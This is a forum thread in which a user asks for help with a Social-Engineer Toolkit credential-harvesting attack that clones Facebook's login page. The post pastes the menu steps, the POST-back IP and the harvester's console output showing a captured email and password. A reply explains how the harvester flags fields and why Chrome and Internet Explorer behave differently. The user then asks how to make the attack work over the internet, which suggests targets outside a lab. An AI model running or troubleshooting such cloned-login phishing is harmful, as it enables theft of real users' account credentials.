Jump to content

SET Credential Harvester Attack


littlemule

Recommended Posts

Can anybody help me with this, this attack has always work fine in the past when ive used it, but now its doing this when i use google chrome, when i used the windows explorer then everthing seems fine,,,,,

Thanks

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>3

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.73
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.1.67 - - [04/Feb/2015 23:24:03] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=1
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: miny_encode_ms=3
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=Miny1~95~,"~,~","~":~0~.~":"~null~],["~login~",{"~php~323xo~",~click~":[~1423090709517~time_spent~ft~posts~":[["~time_spent_bit_array~tos_id~start_time~tos_array~","/~],"~tos_len~tos_seq~tos_cum~},~click_ref_logger~",["~981~act~1~","-","~r~","/",{"~user~":{},"~gt~":{}},~"],~script_path_change~source_path~":"/~source_token~ad976420~dest_path~dest_token~navigation~impression_id~cause~"},~1423090709533~ods~:~ms~page_id~qa~www~x0o534~1423092247919~568~2~1423090706224~15~559~237~unload~0v29~[{"~]],"~trigger~7~4~11~1423090706~1423090698~9~"},{"~325~b279a230~load~1423092244800~0vL8~253~1423092247915~email~bits~js_initialized~]},~1423092247925~]]}]~2E1DCAy1XCIyPQRGSCIyTz2LwUL2TxAWXz2MwYzAwZz2H-2yxAE_1w2DJMw1yJMx2xwFyKyK1A1B1CO1E1F1G2wx2OxAx1xwIVFBH1HMxAE1IG1J1KFBHy1LC1My1NzDw1OzDw1PzDw1QzDw1RC2C1S1TxAERGSCIyTz2KwUL2zxAWXz2IwYz1zwZz2J-1TxA2F2GC1U1V1WBNB1YB1Z2N1DCAy1XC1-yPQ1IG1JzDw1LzDw1N1KFBHy1OC1My1PzDw1QC2Py1RC2Q1S2RxAE_1w2SJ1_w1yJ2UxAw2VyKyK1A1B1CO1E1F1G2Ax2BxAx1xw1-VFBH1H1_xAE1U1V1WBNB1YB1ZGNB2WB2XL1z2Y2ZxA2-
PARAM: ts=1423092247933
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=2
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092252940
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


192.168.1.67 - - [04/Feb/2015 23:24:26] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=1
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","navigation":null,"impression_id":"b279a230","cause":"load"},1423092268014,0],["click_ref_logger",["0vL8",1423092271140,"act",1423092271139,0,"email","click","click","-","r","/",{"ft":{},"gt":{}},562,238,0,981,"p4l5eo","/login.php"],1423092271140,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1423092271161,0]],"trigger":"ods:ms.time_spent.qa.www"}]
PARAM: ts=1423092271180
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=2
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["time_spent_bit_array",{"tos_id":"p4l5eo","start_time":1423092268,"tos_array":[135,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092276055,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092276071
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVqA1uQz
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=0
PARAM: lgnrnd=152349_xc4V
PARAM: lgnjs=1423092268
POSSIBLE USERNAME FIELD FOUND: email=qwerty
POSSIBLE PASSWORD FIELD FOUND: pass=12345
PARAM: default_persistent=0
PARAM: qsstamp=W1tbMTUsMjUsMzAsNDEsNDUsNTUsNzIsNzMsNzcsODksMTIxLDEyMywxNDUsMTk5LDIwMSwyMDgsMjE5LDIyNSwyNDIsMjYxLDI2MywyNjksMzAxLDMwNSwzMDgsMzIyLDM0NiwzOTYsNDI3LDQ0MSw0NjAsNDYzLDQ3Niw0ODAsNTEwLDUyMyw1NDEsNTUyLDU1NSw1NzMsNjI2LDcwM11dLCJBWmx2Vk94aC1GeUxtOXQ1RW81Y01aNjQtY0JmcEJwTGtIV3VXSXVtYlE5NG9FYTB3Tmt2SXZMeW5IRFZQcnlKQ0hhN0xWbUF5Z0FHY1pac1BXUDBFNUktVGNUeEk4WDNKajRLdk43dzNPSXh1dXdubDFhVDI0RTZ2MjVCRjZqRUdickJqV3pIWERFaURuVVVBRWxYSV9xckx0RnNTR3QtTmVwdmpZblpUQURCdkQzM2dXNW9kS0ducHEwd1pDQ2lvcm9VRDVCS1RCMERWRm5TNXlYVlhOTE5fVC1YY2ZacmVHNGhDX25VYzFaOTlRIl0=
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

Link to comment
Share on other sites

Its the top half of the field, were it says

POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}]

It doesnt show the user or password, but if you look at the bottom half it will show the username and password only if i use the windows explorer and not google chrome

Link to comment
Share on other sites

This harvester is a pretty basic component when it comes to harvesting. You send name-value pairs to the server along with your request and if the name contains a word that's on the whitelist, it's marked as a HIT and the info in the request is displayed. The difference between Google and IE probably has a lot to do with Javascript support or even simply the fact that the server detected it as browser X and thus gave it something else to do which was easier to circumvent.

Either way, it's not so much a problem with your setup.

Link to comment
Share on other sites

1. Don't think so.

2. No idea. Maybe someone else can chip in on that.

3. Just go to Oracle's download page, download and install. Easy peasy.

4. It's written right here. Grab git, clone set as described on the page and install (probably compile first. It'll be self-explanatory). Look for a readme or some such.

Link to comment
Share on other sites

  • 3 weeks later...

Keep getting the same problem, when i do the attack on my network, you can see the username and password, but when i do it over the internet i get what ive shown above in previous post, When i do the atttack over the internet everything works fine until the username and password is sent through to my computer and as you can see its just a jumble of letters and numbers. Can anybody help? Cheers

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...